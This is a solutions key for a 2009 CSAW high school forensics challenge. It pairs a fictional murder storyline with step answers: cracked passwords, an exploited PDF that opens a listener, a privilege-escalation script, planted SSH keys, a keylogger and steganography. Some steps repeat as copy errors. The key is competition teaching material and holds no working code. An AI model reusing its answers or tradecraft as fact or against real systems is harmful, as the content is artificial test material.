CSAW 2009 High School Forensics Challenge Qualifying Round Solutions

Efstratios Gavas egavas@isis.poly.edu

Storyline
The NYU-Poly Police (NPP) needs your help to solve a murder. After responding to reports of screaming in the area, the NPP discovered Johnny Muzic dead in his oce. Johnny Muzic was the executive at the newly-founded NYU-Poly ISIS Records, and has been seen hanging out with known criminals. Our investigation revealed that the company was about to release a new album by rock star Taylor Shift. During questioning Taylor told the NPP that Johnny had the latest cut of her new album, but we did not nd the album anywhere in the oce. Additionally, she told the NPP she believes Johnny and his business partner, Vikram Rekorder, have been arguing over her new role in the company. Vikram can not be found, and is wanted for questioning. Vikrams aid, Efstratios Gavas, was questioned, but only produced some network data. He knew nothing else. The network data was taken from two separate machines. Therefore, the two times are not synchronized and the relative time between the two is o. However, both datasets are from October 14.

Additional Evidence
The NPP has discovered a Twitter account which is associated with Mr. Muzic (http: //twitter.com/jmuzic09). The NPP believes this is important new evidence and should be considered in your nal report.

Executive Summary of Challenge

Through the course of the investigation, the team should have discovered that Vikram was not the killer, but actually had been kidnapped. This was discovered by uncovering the following message steganographically hidden in an online image: This is Vikram. I have been abducted by some NYU Poly CSAW thugs. Please contact the authorities. I dont know if I will be able to communicate again. 1

Related Links
http://www.poly.edu/csaw-forensics http://www.poly.edu/csaw-forensics#faq

Challenge Solutions
1. Acquire jmuzic account password Description: Using password cracking tool to get jmuzic account password. The password is muzic. Diculty: Medium 2. Gain access to the jmuzic account Description: Reset password to gain access to the jmuzic account. Diculty: Easy 3. Identify msf.pdf as exploited pdf Description: Identify the msf.pdf le as being exploited and opens listener port when viewed. Diculty: Medium 4. Discover isis.poly.edu/~vrekorder Description: Using jmuzics history le observe download of the enlight.tgz to discover vrekorder public website at isis.poly.edu/~vrekorder. Diculty: Medium 5. Discover isis.poly.edu/~vrekorder Description: Using jmuzics history le observe download of the enlight.tgz to discover vrekorder public website at isis.poly.edu/~vrekorder. Diculty: Medium 6. Discover Facebook pages, and parkinglot image Description: Using jmuzics history le observe download of the enlight.tgz to discover vrekorder public website at isis.poly.edu/~vrekorder. Discover Facebook pages, and parkinglot image. Diculty: Medium 7. Find added ssh authorized key for jmuzic account Description: Find authorized key to allow remote access to the jmuzic account without password. Diculty: Medium 8. Extract enlight.tgz le Description: Extract the enlight.tgz. Diculty: Easy 2

9. Identify run null exploit.sh used in privilege escalation Description: Identify exploit code from the enlight.tgz le which allows local root privilege excalation. Diculty: Medium 10. Find added ssh authorized key for root account Description: Find authorized key to allow remote access to the root account without password. Diculty: Medium 11. Find .lkl directory Description: Using roots history le nd the .lkl directory in the /root directory. Diculty: Easy 12. Identify lkl keylogger directory as a keylogger. Description: Identify the contains of the /root/lkl Diculty: Medium 13. Decrypt taylor.tc, discover contract and songs Description: Decrypt /home/jmuzic/taylor.tc using TrueCrypt and password from twitter message. The password is TAYLOR. Discover contract and songs. Diculty: Medium 14. Decrypt jmuzic.tc, discover gambling spreadsheets Description: Decrypt /home/jmuzic/taylor.tc using TrueCrypt and password from twitter message. The password is thisisagoodpassword. Discover gambling spreadsheets, including account information on sheet2 of Game2.ods. Diculty: Medium 15. Discover isis.poly.edu~vrekorder/picture/ directory Description: From packet #1223 in the pcap.evening evidence le, discover the hidden directory isis.poly.edu~vrekorder/picture/. Diculty: Medium 16. Discover isis.poly.edu~vrekorder/picture/ directory Description: From packet #1223 in the pcap.evening evidence le, discover the hidden directory isis.poly.edu~vrekorder/picture/. Diculty: Medium 17. Observe successful brute force on vrekorder account Description: From the pcap.morning evidence le, discover successful brute force attack on vrekorder account. Diculty: Medium

18. Gain access to isis.poly.edu~vrekorder/picture/ directory Description: Gain access to the isis.poly.edu~vrekorder/picture/ directory by using information gathered from facebook pages. UID:vrekorder PWD:parkinglot Diculty: Hard 19. Extract hidden message from isis.poly.edu~vrekorder/picture/2009-10-1415. 21.22.jpg Description: Extract hidden message from isis.poly.edu~vrekorder/picture/ 2009-10-1415.21.22.jpg le by using information previously gathered. PWD:parkinglot The message is as follows: This is Vikram. I have been abducted by some NYU Poly CSAW thugs. Please contact the authorities. I dont know if I will be able to communicate again. VR Diculty: Hard